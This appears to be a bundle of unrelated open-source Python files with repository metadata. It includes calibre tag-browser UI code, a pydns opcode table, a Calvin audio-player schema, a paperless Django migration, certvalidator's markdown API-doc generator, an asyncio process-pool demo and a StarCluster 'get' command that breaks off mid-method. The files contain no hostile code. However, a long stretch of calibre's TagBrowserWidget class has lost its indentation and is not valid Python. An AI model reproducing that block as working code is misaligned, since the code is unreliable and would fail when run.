            db.field_metadata.remove_user_categories()
            for k in d.categories:
                db.field_metadata.add_user_category('@' + k, k)
            db.data.change_search_locations(db.field_metadata.get_search_terms())
            self.tags_view.recount()

    def do_delete_user_category(self, category_name):
        '''
        Delete the user category named category_name. Any leading '@' is removed
        '''
        if category_name.startswith('@'):
            category_name = category_name[1:]
        db = self.library_view.model().db
        user_cats = db.prefs.get('user_categories', {})
        cat_keys = sorted(user_cats.keys(), key=sort_key)
        has_children = False
        found = False
        # Children are stored as separate keys prefixed "name.".
        for k in cat_keys:
            if k == category_name:
                found = True
                has_children = len(user_cats[k])
            elif k.startswith(category_name + '.'):
                has_children = True
        if not found:
            return error_dialog(self.tags_view, _('Delete user category'),
                    _('%s is not a user category')%category_name, show=True)
        if has_children:
            if not question_dialog(self.tags_view, _('Delete user category'),
                    _('%s contains items. Do you really '
                      'want to delete it?')%category_name):
                return
        # Delete the category and all of its sub-categories.
        for k in cat_keys:
            if k == category_name:
                del user_cats[k]
            elif k.startswith(category_name + '.'):
                del user_cats[k]
        db.prefs.set('user_categories', user_cats)
        self.tags_view.recount()

    def do_del_item_from_user_cat(self, user_cat, item_name, item_category):
        '''
        Delete the item (item_name, item_category) from the user category with
        key user_cat. Any leading '@' characters are removed
        '''
        if user_cat.startswith('@'):
            user_cat = user_cat[1:]
        db = self.library_view.model().db
        user_cats = db.prefs.get('user_categories', {})
        if user_cat not in user_cats:
            error_dialog(self.tags_view, _('Remove category'),
                         _('User category %s does not exist')%user_cat,
                         show=True)
            return
        self.tags_view.model().delete_item_from_user_category(user_cat,
                item_name, item_category)
        self.tags_view.recount()

    def do_add_item_to_user_cat(self, dest_category, src_name, src_category):
        '''
        Add the item src_name in src_category to the user category
        dest_category. Any leading '@' is removed
        '''
        db = self.library_view.model().db
        user_cats = db.prefs.get('user_categories', {})

        if dest_category and dest_category.startswith('@'):
            dest_category = dest_category[1:]

        if dest_category not in user_cats:
            return error_dialog(self.tags_view, _('Add to user category'),
                    _('A user category %s does not exist')%dest_category, show=True)

        # Now add the item to the destination user category
        add_it = True
        # News items are stored as tags.
        if src_category == 'news':
            src_category = 'tags'
        # Avoid duplicate (name, category) entries.
        for tup in user_cats[dest_category]:
            if src_name == tup[0] and src_category == tup[1]:
                add_it = False
        if add_it:
            user_cats[dest_category].append([src_name, src_category, 0])
        db.prefs.set('user_categories', user_cats)
        self.tags_view.recount()

    def do_tags_list_edit(self, tag, category):
        '''
        Open the 'manage_X' dialog where X == category. If tag is not None, the
        dialog will position the editor on that item.
        '''
        tags_model = self.tags_view.model()
        result = tags_model.get_category_editor_data(category)
        if result is None:
            return

        # Series sort by their title-sort form; everything else by icu key.
        if category == 'series':
            key = lambda x:sort_key(title_sort(x))
        else:
            key = sort_key

        db=self.library_view.model().db
        d = TagListEditor(self, cat_name=db.field_metadata[category]['name'],
                          tag_to_match=tag, data=result, sorter=key)
        d.exec_()
        if d.result() == d.Accepted:
            to_rename = d.to_rename  # dict of old id to new name
            to_delete = d.to_delete  # list of ids
            orig_name = d.original_names  # dict of id: name

            # Pick the db functions matching the category being edited.
            rename_func = None
            if category == 'tags':
                rename_func = db.rename_tag
                delete_func = db.delete_tag_using_id
            elif category == 'series':
                rename_func = db.rename_series
                delete_func = db.delete_series_using_id
            elif category == 'publisher':
                rename_func = db.rename_publisher
                delete_func = db.delete_publisher_using_id
            else:  # must be custom
                cc_label = db.field_metadata[category]['label']
                rename_func = partial(db.rename_custom_item, label=cc_label)
                delete_func = partial(db.delete_custom_item_using_id, label=cc_label)
            m = self.tags_view.model()
            if rename_func:
                for item in to_delete:
                    delete_func(item)
                    m.delete_item_from_all_user_categories(orig_name[item], category)
                for old_id in to_rename:
                    rename_func(old_id, new_name=unicode(to_rename[old_id]))
                    m.rename_item_in_all_user_categories(orig_name[old_id],
                            category, unicode(to_rename[old_id]))

            # Clean up the library view
            self.do_tag_item_renamed()
            self.tags_view.recount()

    def do_tag_item_delete(self, category, item_id, orig_name):
        '''
        Delete an item from some category.
        '''
        if not question_dialog(self.tags_view,
                    title=_('Delete item'),
                    msg='<p>'+
                        _('%s will be deleted from all books. Are you sure?')
                        %orig_name,
                    skip_dialog_name='tag_item_delete',
                    skip_dialog_msg=_('Show this confirmation again')):
            return
        db = self.current_db
        # Pick the delete function matching the category being edited.
        if category == 'tags':
            delete_func = db.delete_tag_using_id
        elif category == 'series':
            delete_func = db.delete_series_using_id
        elif category == 'publisher':
            delete_func = db.delete_publisher_using_id
        else:  # must be custom
            cc_label = db.field_metadata[category]['label']
            delete_func = partial(db.delete_custom_item_using_id, label=cc_label)
        m = self.tags_view.model()
        if delete_func:
            delete_func(item_id)
            m.delete_item_from_all_user_categories(orig_name, category)

        # Clean up the library view
        self.do_tag_item_renamed()
        self.tags_view.recount()

    def do_tag_item_renamed(self):
        # Clean up library view and search
        # get information to redo the selection
        rows = [r.row() for r in
                self.library_view.selectionModel().selectedRows()]
        m = self.library_view.model()
        ids = [m.id(r) for r in rows]

        m.refresh(reset=False)
        m.research()
        self.library_view.select_rows(ids)
        # refreshing the tags view happens at the emit()/call() site

    def do_author_sort_edit(self, parent, id_, select_sort=True, select_link=False):
        '''
        Open the manage authors dialog
        '''
        db = self.library_view.model().db
        editor = EditAuthorsDialog(parent, db, id_, select_sort, select_link)
        d = editor.exec_()
        if d:
            # Save and restore the current selections. Note that some changes
            # will cause sort orders to change, so don't bother with attempting
            # to restore the position. Restoring the state has the side effect
            # of refreshing book details.
            with self.library_view.preserve_state(preserve_hpos=False, preserve_vpos=False):
                for (id2, old_author, new_author, new_sort, new_link) in editor.result:
                    if old_author != new_author:
                        # The id might change if the new author already exists
                        id2 = db.rename_author(id2, new_author)
                    db.set_sort_field_for_author(id2, unicode(new_sort),
                                                 commit=False, notify=False)
                    db.set_link_field_for_author(id2, unicode(new_link),
                                                 commit=False, notify=False)
                db.commit()
            self.library_view.model().refresh()
            self.tags_view.recount()

    def drag_drop_finished(self, ids):
        # Refresh only the rows affected by the drag & drop operation.
        self.library_view.model().refresh_ids(ids)

# }}}
class TagBrowserWidget(QWidget): # {{{
def __init__(self, parent):
QWidget.__init__(self, parent)
self.parent = parent
self._layout = QVBoxLayout()
self.setLayout(self._layout)
self._layout.setContentsMargins(0,0,0,0)
# Set up the find box & button
search_layout = QHBoxLayout()
self._layout.addLayout(search_layout)
self.item_search = HistoryLineEdit(parent)
self.item_search.setMinimumContentsLength(5)
self.item_search.setSizeAdjustPolicy(self.item_search.AdjustToMinimumContentsLengthWithIcon)
try:
self.item_search.lineEdit().setPlaceholderText(
_('Find item in tag browser'))
except:
pass # Using Qt < 4.7
self.item_search.setToolTip(_(
'Search for items. This is a "contains" search; items containing the\n'
'text anywhere in the name will be found. You can limit the search\n'
'to particular categories using syntax similar to search. For example,\n'
'tags:foo will find foo in any tag, but not in authors etc. Entering\n'
'*foo will filter all categories at once, showing only those items\n'
'containing the text "foo"'))
search_layout.addWidget(self.item_search)
# Not sure if the shortcut should be translatable ...
sc = QShortcut(QKeySequence(_('ALT+f')), parent)
sc.activated.connect(self.set_focus_to_find_box)
self.search_button = QToolButton()
self.search_button.setText(_('F&ind'))
self.search_button.setToolTip(_('Find the first/next matching item'))
search_layout.addWidget(self.search_button)
self.expand_button = QToolButton()
self.expand_button.setText('-')
self.expand_button.setToolTip(_('Collapse all categories'))
search_layout.addWidget(self.expand_button)
search_layout.setStretch(0, 10)
search_layout.setStretch(1, 1)
search_layout.setStretch(2, 1)
self.current_find_position = None
self.search_button.clicked.connect(self.find)
self.item_search.initialize('tag_browser_search')
self.item_search.lineEdit().returnPressed.connect(self.do_find)
self.item_search.lineEdit().textEdited.connect(self.find_text_changed)
self.item_search.activated[QString].connect(self.do_find)
self.item_search.completer().setCaseSensitivity(Qt.CaseSensitive)
parent.tags_view = TagsView(parent)
self.tags_view = parent.tags_view
self.expand_button.clicked.connect(self.tags_view.collapseAll)
self._layout.addWidget(parent.tags_view)
# Now the floating 'not found' box
l = QLabel(self.tags_view)
self.not_found_label = l
l.setFrameStyle(QFrame.StyledPanel)
l.setAutoFillBackground(True)
l.setText('<p><b>'+_('No More Matches.</b><p> Click Find again to go to first match'))
l.setAlignment(Qt.AlignVCenter)
l.setWordWrap(True)
l.resize(l.sizeHint())
l.move(10,20)
l.setVisible(False)
self.not_found_label_timer = QTimer()
self.not_found_label_timer.setSingleShot(True)
self.not_found_label_timer.timeout.connect(self.not_found_label_timer_event,
type=Qt.QueuedConnection)
parent.alter_tb = l = QPushButton(parent)
l.setText(_('Alter Tag Browser'))
l.setIcon(QIcon(I('tags.png')))
l.m = QMenu()
l.setMenu(l.m)
self._layout.addWidget(l)
sb = l.m.addAction(_('Sort by'))
sb.m = l.sort_menu = QMenu(l.m)
sb.setMenu(sb.m)
sb.bg = QActionGroup(sb)
# Must be in the same order as db2.CATEGORY_SORTS
for i, x in enumerate((_('Sort by name'), _('Sort by popularity'),
_('Sort by average rating'))):
a = sb.m.addAction(x)
sb.bg.addAction(a)
a.setCheckable(True)
if i == 0:
a.setChecked(True)
sb.setToolTip(
_('Set the sort order for entries in the Tag Browser'))
sb.setStatusTip(sb.toolTip())
ma = l.m.addAction(_('Search type when selecting multiple items'))
ma.m = l.match_menu = QMenu(l.m)
ma.setMenu(ma.m)
ma.ag = QActionGroup(ma)
# Must be in the same order as db2.MATCH_TYPE
for i, x in enumerate((_('Match any of the items'), _('Match all of the items'))):
a = ma.m.addAction(x)
ma.ag.addAction(a)
a.setCheckable(True)
if i == 0:
a.setChecked(True)
ma.setToolTip(
_('When selecting multiple entries in the Tag Browser '
'match any or all of them'))
ma.setStatusTip(ma.toolTip())
mt = l.m.addAction(_('Manage authors, tags, etc'))
mt.setToolTip(_('All of these category_managers are available by right-clicking '
'on items in the tag browser above'))
mt.m = l.manage_menu = QMenu(l.m)
mt.setMenu(mt.m)
# self.leak_test_timer = QTimer(self)
# self.leak_test_timer.timeout.connect(self.test_for_leak)
# self.leak_test_timer.start(5000)
def set_pane_is_visible(self, to_what):
self.tags_view.set_pane_is_visible(to_what)
def find_text_changed(self, str):
self.current_find_position = None
def set_focus_to_find_box(self):
self.item_search.setFocus()
self.item_search.lineEdit().selectAll()
def do_find(self, str=None):
self.current_find_position = None
self.find()
    def find(self):
        """Find the next item matching the search box text and highlight it.

        Supports two special forms: text starting with '*' filters the
        visible categories instead of searching items, and 'prefix:text'
        restricts the search to the category whose search term is 'prefix'.
        """
        model = self.tags_view.model()
        model.clear_boxed()
        txt = unicode(self.item_search.currentText()).strip()
        # '*text' switches to category-filtering mode and restarts counting
        if txt.startswith('*'):
            model.set_categories_filter(txt[1:])
            self.tags_view.recount()
            self.current_find_position = None
            return
        # Leaving filter mode: clear any previously-applied category filter
        if model.get_categories_filter():
            model.set_categories_filter(None)
            self.tags_view.recount()
            self.current_find_position = None
        if not txt:
            return
        # Move focus away from the line edit without emitting editing signals
        self.item_search.lineEdit().blockSignals(True)
        self.search_button.setFocus(True)
        self.item_search.lineEdit().blockSignals(False)
        key = None
        # 'category:text' — split on the LAST colon; len(txt) > 2 avoids
        # treating tiny inputs like ':x' as prefixed searches
        colon = txt.rfind(':') if len(txt) > 2 else 0
        if colon > 0:
            key = self.parent.library_view.model().db.\
                field_metadata.search_term_to_field_key(txt[:colon])
            txt = txt[colon+1:]
        # Continue from the previous hit so repeated finds cycle forward
        self.current_find_position = \
            model.find_item_node(key, txt, self.current_find_position)
        if self.current_find_position:
            self.tags_view.show_item_at_path(self.current_find_position, box=True)
        elif self.item_search.text():
            # No match: overlay the "not found" label, sized to fit next to
            # the scrollbar, and auto-hide it after 2 seconds
            self.not_found_label.setVisible(True)
            if self.tags_view.verticalScrollBar().isVisible():
                sbw = self.tags_view.verticalScrollBar().width()
            else:
                sbw = 0
            width = self.width() - 8 - sbw
            height = self.not_found_label.heightForWidth(width) + 20
            self.not_found_label.resize(width, height)
            self.not_found_label.move(4, 10)
            self.not_found_label_timer.start(2000)
    def not_found_label_timer_event(self):
        # Timer slot: hide the transient "not found" overlay.
        self.not_found_label.setVisible(False)
# }}}
|
pra85/calibre
|
src/calibre/gui2/tag_browser/ui.py
|
Python
|
gpl-3.0
| 21,727
|
"""
$Id: Opcode.py,v 1.6.2.1 2011/03/16 20:06:39 customdesigned Exp $
This file is part of the pydns project.
Homepage: http://pydns.sourceforge.net
This code is covered by the standard Python License. See LICENSE for details.
Opcode values in message header. RFC 1035, 1996, 2136.
"""
# DNS message-header opcode values (RFC 1035, 1996, 2136).
QUERY = 0
IQUERY = 1
STATUS = 2
NOTIFY = 4
UPDATE = 5
# Construct reverse mapping dictionary (value -> name) from the public
# names defined above.  A globals() lookup replaces the previous eval(),
# which was slower and a needless code-execution hazard.
_names = dir()
opcodemap = {}
for _name in _names:
    if _name[0] != '_':
        opcodemap[globals()[_name]] = _name
def opcodestr(opcode):
    """Return the symbolic name for *opcode*, or its repr when unknown.

    Replaces the Python-2-only ``dict.has_key`` and backtick-repr syntax
    with ``in`` and ``repr()``, which behave identically on Python 2 and
    also run on Python 3.
    """
    if opcode in opcodemap:
        return opcodemap[opcode]
    return repr(opcode)
#
# $Log: Opcode.py,v $
# Revision 1.6.2.1 2011/03/16 20:06:39 customdesigned
# Refer to explicit LICENSE file.
#
# Revision 1.6 2002/04/23 10:51:43 anthonybaxter
# Added UPDATE, NOTIFY.
#
# Revision 1.5 2002/03/19 12:41:33 anthonybaxter
# tabnannied and reindented everything. 4 space indent, no tabs.
# yay.
#
# Revision 1.4 2002/03/19 12:26:13 anthonybaxter
# death to leading tabs.
#
# Revision 1.3 2001/08/09 09:08:55 anthonybaxter
# added identifying header to top of each file
#
# Revision 1.2 2001/07/19 06:57:07 anthony
# cvs keywords added
#
#
|
g-fleischer/wtfy
|
trackingserver/thirdparty/pydns/DNS/Opcode.py
|
Python
|
gpl-3.0
| 1,174
|
# -*- coding: utf-8 -*-
# Copyright (c) 2017 Ericsson AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from calvin.runtime.south.calvinsys import base_calvinsys_object
class BasePlay(base_calvinsys_object.BaseCalvinsysObject):
    """
    Play audio file
    """

    # JSON schema validating init() arguments: an optional path to the
    # audio file to be played.
    init_schema = {
        "type": "object",
        "properties": {
            "audiofile": {
                "description": "location of file to play",
                "type": "string"
            }
        },
        "description": "Set up audio player"
    }

    # JSON schema for can_write(): a boolean readiness flag.
    can_write_schema = {
        "description": "True iff audio is ready to be played",
        "type": "boolean"
    }

    # JSON schema for write(): a string filename, or null/boolean —
    # presumably falling back to the init-time file; confirm in subclasses.
    write_schema = {
        "description": "Play specified audio file, either specified in argument or at init",
        "type": ["null", "boolean", "string"]
    }
|
EricssonResearch/calvin-base
|
calvinextras/calvinsys/media/audio/play/BasePlay.py
|
Python
|
apache-2.0
| 1,328
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9 on 2016-01-26 21:14
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated by Django 1.9: adds Tag.match and Tag.matching_algorithm
    # and redefines the colour choices. Applied migrations must not be
    # edited logically — only comments here.

    dependencies = [
        ('documents', '0006_auto_20160123_0430'),
    ]

    operations = [
        migrations.AddField(
            model_name='tag',
            name='match',
            field=models.CharField(blank=True, max_length=256),
        ),
        migrations.AddField(
            model_name='tag',
            name='matching_algorithm',
            field=models.PositiveIntegerField(blank=True, choices=[(1, 'Any'), (2, 'All'), (3, 'Literal'), (4, 'Regular Expression')], help_text='Which algorithm you want to use when matching text to the OCR\'d PDF. Here, "any" looks for any occurrence of any word provided in the PDF, while "all" requires that every word provided appear in the PDF, albeit not in the order provided. A "literal" match means that the text you enter must appear in the PDF exactly as you\'ve entered it, and "regular expression" uses a regex to match the PDF. If you don\'t know what a regex is, you probably don\'t want this option.', null=True),
        ),
        migrations.AlterField(
            model_name='tag',
            name='colour',
            field=models.PositiveIntegerField(choices=[(1, '#a6cee3'), (2, '#1f78b4'), (3, '#b2df8a'), (4, '#33a02c'), (5, '#fb9a99'), (6, '#e31a1c'), (7, '#fdbf6f'), (8, '#ff7f00'), (9, '#cab2d6'), (10, '#6a3d9a'), (11, '#b15928'), (12, '#000000'), (13, '#cccccc')], default=1),
        ),
    ]
|
fwilk/paperless
|
src/documents/migrations/0007_auto_20160126_2114.py
|
Python
|
gpl-3.0
| 1,579
|
# coding: utf-8
from __future__ import unicode_literals, division, absolute_import, print_function
import re
import os
import ast
import _ast
import textwrap
import CommonMark
from collections import OrderedDict
# Locations used when scanning for markdown documents to regenerate
cur_dir = os.path.dirname(__file__)
project_dir = os.path.abspath(os.path.join(cur_dir, '..'))
docs_dir = os.path.join(project_dir, 'docs')
module_name = 'certvalidator'
# Maps a markdown document to a Python source file to look in for
# class/method/function docstrings
MD_SOURCE_MAP = {
    'docs/api.md': [
        'certvalidator/__init__.py',
        'certvalidator/context.py',
    ],
}
# A search/replace dictionary to modify docstring contents before generating
# markdown from them
definition_replacements = {}
# Old CommonMark releases exposed a DocParser class; its presence means the
# installed version predates the Parser API used below.
if hasattr(CommonMark, 'DocParser'):
    raise EnvironmentError("CommonMark must be version 0.6.0 or newer")
def _get_func_info(docstring, def_lineno, code_lines, prefix):
    """
    Extract a function's signature and description from its source.

    :param docstring:
        A unicode string of the function's docstring

    :param def_lineno:
        An integer line number the function was defined on

    :param code_lines:
        A list of unicode string lines from the source file the function
        was defined in

    :param prefix:
        A prefix to prepend to all output lines

    :return:
        A 2-element tuple: [0] the signature with an embedded docstring of
        parameter info, [1] a markdown snippet of the function description
    """
    # Gather the (possibly multi-line) "def" statement up to its colon
    index = def_lineno - 1
    definition = code_lines[index].rstrip()
    while not definition.endswith(':'):
        index += 1
        definition = definition + '\n' + code_lines[index].rstrip()
    definition = textwrap.dedent(definition).rstrip(':')
    definition = definition.replace('\n', '\n' + prefix)
    # Split the docstring into the free-form description and the field
    # block (everything from the first line starting with ':')
    descr_lines = []
    param_lines = []
    in_params = False
    for line in docstring.splitlines():
        if line and line[0] == ':':
            in_params = True
        if in_params:
            param_lines.append(line)
        else:
            descr_lines.append(line)
    description = '\n'.join(descr_lines).strip()
    description_md = ''
    if description:
        description_md = '%s%s' % (prefix, description.replace('\n', '\n' + prefix))
        description_md = re.sub('\n>(\\s+)\n', '\n>\n', description_md)
    params = '\n'.join(param_lines).strip()
    if params:
        # Re-embed the parameter docs as a docstring inside the signature
        definition += (':\n%s """\n%s ' % (prefix, prefix))
        definition += params.replace('\n', '\n%s ' % prefix)
        definition += ('\n%s """' % prefix)
    definition = re.sub('\n>(\\s+)\n', '\n>\n', definition)
    for search, replace in definition_replacements.items():
        definition = definition.replace(search, replace)
    return (definition, description_md)
def _find_sections(md_ast, sections, last, last_class, total_lines=None):
    """
    Walks through a CommonMark AST to find section headers that delineate
    content that should be updated by this script

    :param md_ast:
        The AST of the markdown document

    :param sections:
        A dict to store the start and end lines of a section. The key will be
        a two-element tuple of the section type ("class", "function",
        "method" or "attribute") and identifier. The values are a two-element
        tuple of the start and end line number in the markdown document of the
        section.

    :param last:
        A dict containing information about the last section header seen.
        Includes the keys "type_name", "identifier", "start_line".

    :param last_class:
        A list of unicode strings of class names found so far - used when
        processing methods and attributes (the last entry is the current
        class).

    :param total_lines:
        An integer of the total number of lines in the markdown document -
        used to work around a bug in the API of the Python port of CommonMark
    """
    # walker() yields the root node itself first; skip it
    def child_walker(node):
        for child, entering in node.walker():
            if child == node:
                continue
            yield child, entering
    for child, entering in child_walker(md_ast):
        if child.t == 'heading':
            start_line = child.sourcepos[0][0]
            # A level-2 heading ends any open section
            if child.level == 2:
                if last:
                    sections[(last['type_name'], last['identifier'])] = (last['start_line'], start_line - 1)
                    last.clear()
            # Level 3 = class/function headers, level 5 = method/attribute
            if child.level in set([3, 5]):
                heading_elements = []
                for heading_child, _ in child_walker(child):
                    heading_elements.append(heading_child)
                # Expected shape: `identifier()` code span + " type" text
                if len(heading_elements) != 2:
                    continue
                first = heading_elements[0]
                second = heading_elements[1]
                if first.t != 'code':
                    continue
                if second.t != 'text':
                    continue
                type_name = second.literal.strip()
                identifier = first.literal.strip().replace('()', '').lstrip('.')
                # A new recognized header closes the previous section
                if last:
                    sections[(last['type_name'], last['identifier'])] = (last['start_line'], start_line - 1)
                    last.clear()
                if type_name == 'function':
                    if child.level != 3:
                        continue
                if type_name == 'class':
                    if child.level != 3:
                        continue
                    last_class.append(identifier)
                if type_name in set(['method', 'attribute']):
                    if child.level != 5:
                        continue
                    # Qualify with the enclosing class name
                    identifier = last_class[-1] + '.' + identifier
                last.update({
                    'type_name': type_name,
                    'identifier': identifier,
                    'start_line': start_line,
                })
        elif child.t == 'block_quote':
            # Method/attribute sections live inside block quotes - recurse
            find_sections(child, sections, last, last_class)
    # Close the final section at the end of the document
    if last:
        sections[(last['type_name'], last['identifier'])] = (last['start_line'], total_lines)
# Public alias used by run() and for recursion above
find_sections = _find_sections
def walk_ast(node, code_lines, sections, md_chunks):
    """
    A callback used to walk the Python AST looking for classes, functions,
    methods and attributes. Generates chunks of markdown markup to replace
    the existing content.

    :param node:
        An _ast module node object

    :param code_lines:
        A list of unicode strings - the source lines of the Python file

    :param sections:
        A dict of markdown document sections that need to be updated. The key
        will be a two-element tuple of the section type ("class", "function",
        "method" or "attribute") and identifier. The values are a two-element
        tuple of the start and end line number in the markdown document of the
        section.

    :param md_chunks:
        A dict with keys from the sections param and the values being a unicode
        string containing a chunk of markdown markup.
    """
    if isinstance(node, _ast.FunctionDef):
        # Only regenerate functions that have a matching markdown section
        key = ('function', node.name)
        if key not in sections:
            return
        docstring = ast.get_docstring(node)
        # Decorators shift the "def" line down in the source file
        def_lineno = node.lineno + len(node.decorator_list)
        definition, description_md = _get_func_info(docstring, def_lineno, code_lines, '> ')
        md_chunk = textwrap.dedent("""
            ### `%s()` function
            > ```python
            > %s
            > ```
            >
            %s
        """).strip() % (
            node.name,
            definition,
            description_md
        ) + "\n"
        md_chunks[key] = md_chunk
    elif isinstance(node, _ast.ClassDef):
        if ('class', node.name) not in sections:
            return
        for subnode in node.body:
            if isinstance(subnode, _ast.FunctionDef):
                node_id = node.name + '.' + subnode.name
                method_key = ('method', node_id)
                is_method = method_key in sections
                attribute_key = ('attribute', node_id)
                is_attribute = attribute_key in sections
                is_constructor = subnode.name == '__init__'
                if not is_constructor and not is_attribute and not is_method:
                    continue
                docstring = ast.get_docstring(subnode)
                def_lineno = subnode.lineno + len(subnode.decorator_list)
                # Undocumented members are skipped entirely
                if not docstring:
                    continue
                if is_method or is_constructor:
                    definition, description_md = _get_func_info(docstring, def_lineno, code_lines, '> > ')
                    if is_constructor:
                        # The constructor's docs are folded into the class
                        # section, together with the class docstring
                        key = ('class', node.name)
                        class_docstring = ast.get_docstring(node) or ''
                        class_description = textwrap.dedent(class_docstring).strip()
                        if class_description:
                            class_description_md = "> %s\n>" % (class_description.replace("\n", "\n> "))
                        else:
                            class_description_md = ''
                        md_chunk = textwrap.dedent("""
                            ### `%s()` class
                            %s
                            > ##### constructor
                            >
                            > > ```python
                            > > %s
                            > > ```
                            > >
                            %s
                        """).strip() % (
                            node.name,
                            class_description_md,
                            definition,
                            description_md
                        )
                        md_chunk = md_chunk.replace('\n\n\n', '\n\n')
                    else:
                        key = method_key
                        md_chunk = textwrap.dedent("""
                            >
                            > ##### `.%s()` method
                            >
                            > > ```python
                            > > %s
                            > > ```
                            > >
                            %s
                        """).strip() % (
                            subnode.name,
                            definition,
                            description_md
                        )
                        # Drop a trailing empty quote line left by an
                        # empty description
                        if md_chunk[-5:] == '\n> >\n':
                            md_chunk = md_chunk[0:-5]
                else:
                    # Properties documented as attributes: docstring only
                    key = attribute_key
                    description = textwrap.dedent(docstring).strip()
                    description_md = "> > %s" % (description.replace("\n", "\n> > "))
                    md_chunk = textwrap.dedent("""
                        >
                        > ##### `.%s` attribute
                        >
                        %s
                    """).strip() % (
                        subnode.name,
                        description_md
                    )
                # Strip trailing whitespace from every generated line
                md_chunks[key] = re.sub('[ \\t]+\n', '\n', md_chunk.rstrip())
    elif isinstance(node, _ast.If):
        # Recurse into "if" bodies so definitions guarded by version
        # checks are still discovered
        for subast in node.body:
            walk_ast(subast, code_lines, sections, md_chunks)
        for subast in node.orelse:
            walk_ast(subast, code_lines, sections, md_chunks)
def run():
    """
    Looks through the docs/ dir and parses each markdown document, looking for
    sections to update from Python docstrings. Looks for section headers in
    the format:

     - ### `ClassName()` class
     - ##### `.method_name()` method
     - ##### `.attribute_name` attribute
     - ### `function_name()` function

    The markdown content following these section headers up until the next
    section header will be replaced by new markdown generated from the Python
    docstrings of the associated source files.

    By default maps docs/{name}.md to {modulename}/{name}.py. Allows for
    custom mapping via the MD_SOURCE_MAP variable.
    """
    print('Updating API docs...')
    # Collect every markdown file under docs/
    md_files = []
    for root, _, filenames in os.walk(docs_dir):
        for filename in filenames:
            if not filename.endswith('.md'):
                continue
            md_files.append(os.path.join(root, filename))
    parser = CommonMark.Parser()
    for md_file in md_files:
        md_file_relative = md_file[len(project_dir) + 1:]
        # Resolve which Python source files document this markdown file
        if md_file_relative in MD_SOURCE_MAP:
            py_files = MD_SOURCE_MAP[md_file_relative]
            py_paths = [os.path.join(project_dir, py_file) for py_file in py_files]
        else:
            py_files = [os.path.basename(md_file).replace('.md', '.py')]
            py_paths = [os.path.join(project_dir, module_name, py_files[0])]
            if not os.path.exists(py_paths[0]):
                continue
        with open(md_file, 'rb') as f:
            markdown = f.read().decode('utf-8')
        original_markdown = markdown
        md_lines = list(markdown.splitlines())
        md_ast = parser.parse(markdown)
        last_class = []
        last = {}
        sections = OrderedDict()
        # markdown.count("\n") + 1 works around missing end positions in
        # the CommonMark Python port
        find_sections(md_ast, sections, last, last_class, markdown.count("\n") + 1)
        md_chunks = {}
        for index, py_file in enumerate(py_files):
            py_path = py_paths[index]
            with open(os.path.join(py_path), 'rb') as f:
                code = f.read().decode('utf-8')
            module_ast = ast.parse(code, filename=py_file)
            code_lines = list(code.splitlines())
            for node in ast.iter_child_nodes(module_ast):
                walk_ast(node, code_lines, sections, md_chunks)
        added_lines = 0
        # Splice one regenerated chunk into md_lines, tracking how much
        # earlier replacements shifted later section offsets
        def _replace_md(key, sections, md_chunk, md_lines, added_lines):
            start, end = sections[key]
            start -= 1
            start += added_lines
            end += added_lines
            new_lines = md_chunk.split('\n')
            added_lines += len(new_lines) - (end - start)
            # Ensure a newline above each class header
            if start > 0 and md_lines[start][0:4] == '### ' and md_lines[start - 1][0:1] == '>':
                added_lines += 1
                new_lines.insert(0, '')
            md_lines[start:end] = new_lines
            return added_lines
        for key in sections:
            if key not in md_chunks:
                raise ValueError('No documentation found for %s' % key[1])
            added_lines = _replace_md(key, sections, md_chunks[key], md_lines, added_lines)
        markdown = '\n'.join(md_lines).strip() + '\n'
        # Only rewrite the file when something actually changed
        if original_markdown != markdown:
            with open(md_file, 'wb') as f:
                f.write(markdown.encode('utf-8'))
# Script entry point: regenerate the API docs in place.
if __name__ == '__main__':
    run()
|
kak-bo-che/certvalidator
|
dev/api_docs.py
|
Python
|
mit
| 14,979
|
import asyncio
from concurrent.futures import ProcessPoolExecutor
print('running async test')
def say_boo():
    """Print an endless stream of numbered 'boo' messages."""
    counter = 0
    while True:
        print('...boo {0}'.format(counter))
        counter += 1
def say_baa():
    """Print an endless stream of numbered 'baa' messages."""
    counter = 0
    while True:
        print('...baa {0}'.format(counter))
        counter += 1
if __name__ == "__main__":
executor = ProcessPoolExecutor(2)
loop = asyncio.get_event_loop()
boo = asyncio.ensure_future(loop.run_in_executor(executor, say_boo))
baa = asyncio.ensure_future(loop.run_in_executor(executor, say_baa))
loop.run_forever()
|
fs714/ipyexample
|
asynchronous/py36/asyncio/example02.py
|
Python
|
apache-2.0
| 557
|
# Copyright 2009-2014 Justin Riley
#
# This file is part of StarCluster.
#
# StarCluster is free software: you can redistribute it and/or modify it under
# the terms of the GNU Lesser General Public License as published by the Free
# Software Foundation, either version 3 of the License, or (at your option) any
# later version.
#
# StarCluster is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
# details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with StarCluster. If not, see <http://www.gnu.org/licenses/>.
import glob
from starcluster import exception
from completers import ClusterCompleter
class CmdGet(ClusterCompleter):
    """
    get [options] <cluster_tag> [<remote_file_or_dir> ...] <local_destination>

    Copy one or more files from a running cluster to your local machine

    Examples:

        # Copy a file or dir from the master as root
        $ starcluster get mycluster /path/on/remote/server /local/file/or/dir

        # Copy a file and a dir from the master as root
        $ starcluster get mycluster /remote/file /remote/dir /local/dir

        # Copy a file or dir from the master as normal user
        $ starcluster get mycluster --user myuser /remote/path /local/path

        # Copy a file or dir from a node (node001 in this example)
        $ starcluster get mycluster --node node001 /remote/path /local/path
    """
    names = ['get']

    def addopts(self, parser):
        # Which remote user to transfer as, and which node to copy from.
        parser.add_option("-u", "--user", dest="user", default=None,
                          help="Transfer files as USER ")
        parser.add_option("-n", "--node", dest="node", default="master",
                          help="Transfer files from NODE (defaults to master)")

    def execute(self, args):
        """Fetch the requested remote paths to the local destination."""
        if len(args) < 3:
            self.parser.error("please specify a cluster, remote file or " +
                              "directory, and a local destination path")
        cluster_tag = args[0]
        local_path = args[-1]
        remote_paths = args[1:-1]
